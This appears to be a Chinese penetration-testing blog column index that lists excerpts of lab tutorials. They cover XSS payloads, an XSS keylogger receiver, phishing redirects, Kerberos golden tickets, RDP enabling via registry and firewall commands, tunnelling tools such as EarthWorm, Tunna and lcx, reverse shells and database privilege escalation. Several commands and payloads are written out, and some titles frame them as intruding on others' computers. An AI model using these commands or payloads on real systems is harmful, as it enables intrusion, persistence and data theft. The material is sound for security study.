渗透测试
文章平均质量分 94
这里记录着小白学习渗透的成长之路
加油❗️❗️❗️
┃ ┏┃┃┃┏┛
┃ ━┛━┛┏┛
━┛❤️❤️ ━┛
admin-r꯭o꯭ot꯭
个人公众号:爱国小白帽
推送技术原创及好用的安全工具
因为我也是小白所以文章没啥深度,很适合小白学习,有问题可以一起探讨哦
展开
-
xss.haozi练习通关详解
题目连接:https://xss.haozi.me0x00原理解读:这个游戏是要弹图片才算通关的,光弹窗不行,所以第一关就用最简单的img标签过payload:<img src="任意图片名" onerror="alert(1)">0x01原理解读:从server code中可以看到输入的内容被插入到了<textarea>标签中,所以只要闭合这个标签就行了payload:</textarea><img src="任意图片名" onerror=原创 2020-11-05 12:01:12 · 2541 阅读 · 5 评论 -
【Linux系统入侵】——SSH远程登录
ssh是什么?ssh是一种通信协议,用于与另一台计算机通信,有多个实现版本,openssh属于开源实现实验准备:虚拟机两台linux系统(一台做入侵机一台做受害机)两台机子都用NAT模式连接局域网开始入侵实验:1、首先查看本机IP在什么网段,如图在192.168.70.0网段2、然后使用namp扫描此网段存在的主机,如:namp -sP 192.168.70.0/24发...原创 2020-03-01 15:13:48 · 8724 阅读 · 28 评论 -
后渗透——域权限维持之利用黄金票据与白银票据获取域控权限
声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理权限维持黄金票据ms14068的漏洞原理是伪造域管的tgt,而黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户黄金票据的条件要求:1.域名称...原创 2020-04-03 16:00:46 · 5821 阅读 · 16 评论 -
metasploit工具的Windows版安装及使用教程
点击下载msfconsole原创 2020-03-29 15:10:41 · 21493 阅读 · 16 评论 -
一个简单的bat脚本便可实现局域网所有存活IP的精准扫描
此脚本的扫描可在几秒钟之内完成脚本内容无需更改,如下:@echo offFOR /L %%I in (1,1,255) do ping 192.168.1.%%I -n 1 -w 100arp -a >C:\Users\Administrator\Desktop\1.txtexit保存后双击执行就会出现1.txt文件,里面会出现所有存活主机的IP...原创 2020-03-23 23:45:34 · 4359 阅读 · 2 评论 -
window系统命令模式下开启远程桌面服务以及开放3389端口
开启远程桌面服务REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f开放3389端口netsh advfirewall firewall add rule name="无所谓" dir=in protocol=tcp ...原创 2020-03-23 11:03:31 · 3880 阅读 · 2 评论 -
入侵别人电脑后你必须要会的Linux与window系统用命令行下载网络资源的15种方式
我花了一天时间精心整理本文,有百度的经典方案,有老师的精心传授,也有自己的实践总结,如果觉得有用就转发收藏吧❤️别忘点赞哦????这样可以帮助到更多的人????window系统常见下载方式FTP脚本vbs脚本bitsadmin命令$client命令Linux系统常见下载方式wgetcurllynxfetchAxelaria2youtube-dl双方均可用linkslink...原创 2020-03-22 16:02:05 · 5115 阅读 · 17 评论 -
后渗透——内网转发之借助WinRAR软件用命令行打包压缩网站源码
WinRAR是一个强大的压缩文件管理工 具。它能备份你的数据,减少你的E-mail附件的大小,解压缩从Internet上下载的RAR、ZIP和其他格式的压缩文件实验环境:例:把D:\webs\目录下的所有东西打包为1.rar放到D:\webs\目录下,以便下载 rar.exe a -k -r -s -m1 D:\webs\1.rar D:\webs 常用压缩命令 rar.ex...原创 2020-03-22 11:29:14 · 2607 阅读 · 6 评论 -
后渗透——内网转发之利用ftp实现文件传输
FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,...原创 2020-03-21 19:29:05 · 3571 阅读 · 0 评论 -
后渗透——内网转发之利用reGeorg与proxychains在kali中连接远程桌面
reGeorgs是HTTP端的代理工具,它提供了PHP、ASPX、JSP脚本,直接访问显示“Georg says, ‘All seems fine’”,表示脚本运行正常。实验环境:reGeorg-master代理工具Windows Server 2008 R2 x64(192.168.70.128)Windows Server 2003(10.1.1.2)IIS服务器kali...原创 2020-03-19 18:53:45 · 2718 阅读 · 0 评论 -
后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器
EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。反向攻击者ew.exe -s rcsocks -l 1080 -e 8888受害者win2008e...原创 2020-03-18 22:42:35 · 1730 阅读 · 2 评论 -
后渗透——内网转发之利用EarthWorm与proxifier搭建正向代理服务器
EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。实验环境:Windows Server 2008 R2 x64(192.168.70.128、10.1...原创 2020-03-18 21:58:02 · 1739 阅读 · 0 评论 -
后渗透——内网转发之利用内网穿透工具Tunna转发端口连接远程桌面
Tunna:一款神奇的工具,它可以通过HTTP封装隧道通信任何TCP,以及用于绕过防火墙环境中的网络限制。命令python proxy.py -u http://192.168.70.129/conn.aspx -l 2345 -a 10.1.1.1 -r 3389 -s -v参数含义如下:-l 表示本地监听的端口-r 远程要转发的端口-v 详细模式实验环境:Window...原创 2020-03-18 17:23:06 · 1366 阅读 · 0 评论 -
后渗透——内网转发之利用防火墙规则转发端口实现远程桌面连接
实验环境:Windows Server 2008 R2 x64Windows Server 2003IIS服务器环境搭建:模拟实验:原创 2020-03-18 15:52:44 · 2035 阅读 · 0 评论 -
后渗透——利用nc与reduh在有防火墙的情况下通过网站的80端口连接远程桌面
我们都知道一个端口只能为一个程序服务,如果两个程序用一个端口就会出现端口占用的情况,reduh这个工具就打破了这种规则,它可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。也就是在不用关闭网站的情况下80端口可以两个程序共用实验环境:reDuh-masterWindows Server 2008 R2 x64IIS服务器瑞士军刀nc环境搭建:...原创 2020-03-17 21:59:55 · 1809 阅读 · 0 评论 -
后渗透——利用lcx反弹端口获取内网机器远程桌面
使用场景外网不能访问内网目标机,但是可以访问内网跳板机,目标机3389端口只能本地访问,此时我们要用外网连接目标机的远程桌面如图:实验环境:Windows Server 2008 R2 x64(跳板机)Windows Server 2003(目标机)lcx.exeLcx工具有三个参数功能如下:listen 监听端口tran 将一个端口的流量转发到另一个端口s...原创 2020-03-17 20:49:48 · 2006 阅读 · 0 评论 -
后渗透——利用kali工具MSF反弹shell
msfconsole可能是Metasploit框架(MSF)最流行的接口。它提供了一个“一体化”的集中控制台,并允许您高效地访问MSF中几乎所有可用的选项。MSFconsole一开始可能看起来有些吓人,但是一旦您了解了命令的语法,您就会了解利用这个接口的强大功能。实验环境:Windows Server 2008 R2 x64kali模拟实验:首先输入msfconsole打开软...原创 2020-03-16 19:42:57 · 5396 阅读 · 0 评论 -
后渗透——权限维持之获取系统管理员administrator密码
什么是权限维持当攻击者获取服务器权限后,通常会采用一些后门技术来维持自己当前得到的权限,服务器一旦被植入后门,那么攻击者下次进入就方便多了。由于攻击可能被发现,会清除一些shell,导致目标丢失,所以需要留下后门来维持权限,达到持续控制的目的。实验环境:Windows Server 2008 R2 x64SqlServer模拟实验:...原创 2020-03-16 17:02:20 · 2132 阅读 · 0 评论 -
后渗透——内网转发之反弹shell
内网转发目的渗透测试中,我们往往会面对十分复杂的内网环境。比如最常用的防火墙,它会限制特定端口的数据包出入。内网转发三种形式反弹shell在攻击者机器,获取受害者机器的命令行反弹端口受害者服务器的某一个端口不能访问,我们通过反弹端口的形式,让攻击者能够访问该端口 也叫端口转发反弹代理将攻击者的流量,转发到内网其他服务器上实验环境:瑞士军刀ncWindows ...原创 2020-03-16 12:34:27 · 3357 阅读 · 0 评论 -
后渗透——Filezilla第三方软件提权
FilezillaFileZilla是一个免费开源的FTP软件,分为客户端版本和服务器版本,具备所有的FTP软件功能。可控性、有条理的界面和管理多站点的简化方式使得Filezilla客户端版成为一个方便高效的FTP客户端工具,而FileZilla Server则是一个小巧并且可靠的支持FTP&SFTP的FTP服务器软件。Filezilla和普通Web网站一样,前台有普通FTP账户执行...原创 2020-03-13 09:15:35 · 3624 阅读 · 3 评论 -
后渗透—— 数据库之MOF提权
提权原理:mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户...原创 2020-03-12 09:31:21 · 1376 阅读 · 0 评论 -
后渗透—— 数据库之开机启动项提权
开机启动项提权原理:利用mysql,将后门写入开机自启动项。同时因为是开机自启动,再写入之后,需要重启目标服务器。(这个要求mysql的权限就很高,至少是管理员权限甚至是system)实验环境Windows Server 2008 R2 x64wampMySQL-5.5.15-(64-bit).msixampp-win32-5.6.28-1-VC11-installer菜刀s...原创 2020-03-12 08:47:40 · 762 阅读 · 0 评论 -
后渗透—— 数据库之udf提权
利用MySQL提权原理:1、 具有mysql的root权限,且mysql以system权限运行。2、 具有执行sql语句的权限,webshell或者外连皆可。UDF提权UDF是mysql的一个拓展接口,UDF(Userdefined function)可翻译为用户自定义函数,这个是用来拓展Mysql的技术手段。原理:UDF可以理解为MySQL的函数库,可以利用UDF定义创建函数。(其...原创 2020-03-12 00:04:33 · 789 阅读 · 0 评论 -
后渗透—— Linux系统权限提升
目录实验环境漏洞版本对照表模拟实验1、配置环境2、开始提权实验环境CentOS 6.5lamp菜刀瑞士军刀nc漏洞版本对照表CVE-2017-1000367 [Sudo](Sudo 1.8.6p7 - 1.8.20) CVE-2017-7494 [Samba Remote execution](Samba 3.5.0-4.6.4/4.5.10/4.4.14) C...原创 2020-03-11 21:19:25 · 2194 阅读 · 6 评论 -
后渗透—— Windows系统权限提升
提权目的有时候,通过某些方式(如上传Webshell)获取执行命令的shell,但是会因为权限限制而无法执行某些命令。这时候为了“扩大战果”就需要利用提权,来让原本的低权限(如只允许列目录)–>高权限(拥有修改文件的能力)。提权方式本地漏洞提权数据库提权第三方软件提权...原创 2020-03-10 20:39:05 · 2542 阅读 · 0 评论 -
漏洞复现篇——Struts2反序列化漏洞
Struts2是什么?Struts2 是 Apache 软件组织推出的一个相当强大的 Java Web 开源框架,本质上相当于一个 servlet。Struts2 基于 MVC 架构,框架结构清晰。通常作为控制器(Controller)来建立模型与视图的数据交互,用于创建企业级 Java web 应用程序这套 Struts2 入门教程对 Struts2 框架进行了讲解,采用基础知识与案例相结...原创 2020-03-03 10:28:26 · 3958 阅读 · 1 评论 -
漏洞复现篇——Typecho反序列化漏洞
实验环境:PHPstudy火狐浏览器Typecho填好数据库密码和你的登录密码就可以了安装时会报错,因为无法自动创建数据库,需要使用CREATE DATABASE typecho default charset utf8;语句手动创建数据库...原创 2020-03-03 09:30:42 · 5209 阅读 · 0 评论 -
漏洞复现篇——PHP反序列化漏洞
简介PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但其原理基本相通。什么是序列化和...原创 2020-02-28 12:43:26 · 4345 阅读 · 0 评论 -
漏洞复现篇——命令执行漏洞
什么是命令执行漏洞?日常的网络访问中,我们常常可以看到某些Web网站具有执行系统命令的功能,比如:有些网站提供ping功能,我们可以输入一个IP地址,它就会帮我们去尝试ping目标的IP地址,而我们则可以看到执行结果。但是如果用户没有遵循网站的本意,而去输入精心构造的指令,可能会对网站本身的功能逻辑产生逆转,导致让目标网站执行恶意命令。命令执行漏洞-分类web代码层命令执行ex...原创 2020-02-27 21:36:17 · 2526 阅读 · 0 评论 -
漏洞复现篇——任意代码命令执行漏洞复现及防御
什么是代码执行:当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能够控制这个字符串,将造成代码注入漏洞。代码执行函数:在php中:eval,assert,preg_replace(‘/*/e’, 'ret="1";′,ret = "\\1";',ret="1";′,data);在asp中:eval, exevute,executeglobal在jsp中:jsp中没有p...原创 2020-02-27 20:43:09 · 4008 阅读 · 0 评论 -
漏洞复现篇——利用vulhub模拟Weblogic的SSRF漏洞
SSRF漏洞:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。...原创 2021-01-15 18:59:33 · 3210 阅读 · 5 评论 -
漏洞复现篇——CSRF漏洞的利用
CSRF漏洞原理CSRF(Cross Site Request Forgery, 跨站请求伪造)是一种网络的攻击方式,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF。CSRF漏洞是因为web应用程序在用户进行敏感操作时,如修改账号密码、添加账号、转账等,没有校验表单token或者http请求头中的referer值,从而导致恶意攻击...原创 2020-02-25 23:47:21 · 10529 阅读 · 0 评论 -
漏洞复现篇——XSS靶场小游戏
实验环境:PHPstudyxss闯关小游戏火狐浏览器原创 2020-02-25 19:08:19 · 4212 阅读 · 0 评论 -
漏洞复现篇——利用XSS漏洞实现多种网络钓鱼方法
实验环境:PHPstudy火狐浏览器、IEDVWA靶场实验准备:重定向钓鱼,例如重定向到百度,代码如下:< script> document.location ="http://www.baidu.com" </script> ...原创 2020-02-24 21:27:19 · 4954 阅读 · 0 评论 -
BlueLotus_XSSReceiver——XSS数据接收工具的使用
XSS数据接收平台(无SQL版)如从旧版本升级,请务必先阅读Readme平台说明本平台设计理念: 简单配置即可使用,无需数据库,无需其他组件支持,可直接在php虚拟空间使用实验环境:PHPstudyPHPstudy_pro火狐浏览器DVWA靶场BlueLotus_XSSReceiver实验准备:PHPstudy端口改为88将BlueLotus_XSSReceive...原创 2020-02-24 21:01:24 · 5274 阅读 · 8 评论 -
kali中浏览器攻击框架BeEF的使用
BeEF( The Browser Exploitation Framework) 是由Wade Alcorn 在2006年开始创建的,至今还在维护。是由ruby语言开发的专门针对浏览器攻击的框架。这个框架也属于cs的结构实验环境:PHPstudy火狐浏览器、IEDVWA靶场kali安装:新版kali里面没有需要安装,命令如下:apt-get install beef-x...原创 2020-02-24 19:33:02 · 7833 阅读 · 0 评论 -
Google黑客常用搜索语句(新增)
通过这些搜索语句你可以搜索到想要的任何东西,如果你还有其他更好的语句欢迎补充inurl:share.cgi?ssid= 云服务器文件和文件夹共享intitle:"Welcome to QNAP Turbo NAS" QNAP登录页面inurl:"img/main.cgi?next_file" ...原创 2020-02-22 09:38:56 · 16703 阅读 · 2 评论 -
漏洞复现篇——利用XSS漏洞实现键盘记录
实验环境:PHPstudy火狐浏览器、IEDVWA靶场实验准备:在www目录下创建一个名为keylog.php的文件,代码如下:<?php$file = fopen("key.txt","a");if(isset($_REQUEST['key'])) { $key = $_REQUEST['key']; fputs($file,$key);}?>模拟实验...原创 2020-02-21 19:51:28 · 1792 阅读 · 0 评论 -
漏洞复现篇——利用XSS漏洞获取cookie
实验环境:PHPstudy火狐浏览器、IEDVWA靶场原创 2020-02-20 18:50:46 · 3041 阅读 · 0 评论 -
漏洞复现篇——XSS三种攻击方式讲解
实验环境:PHPstudy火狐浏览器、IEDVWA靶场模拟实验:DOM:1、把级别调成low,选择DOM点击Select2、将url中的English换成<script>alert(/xxx/)</script>,出现弹窗Reflected1、在框中输入<script>alert(/xxx/)</script>,点击Subm...原创 2020-02-20 12:08:34 · 4920 阅读 · 0 评论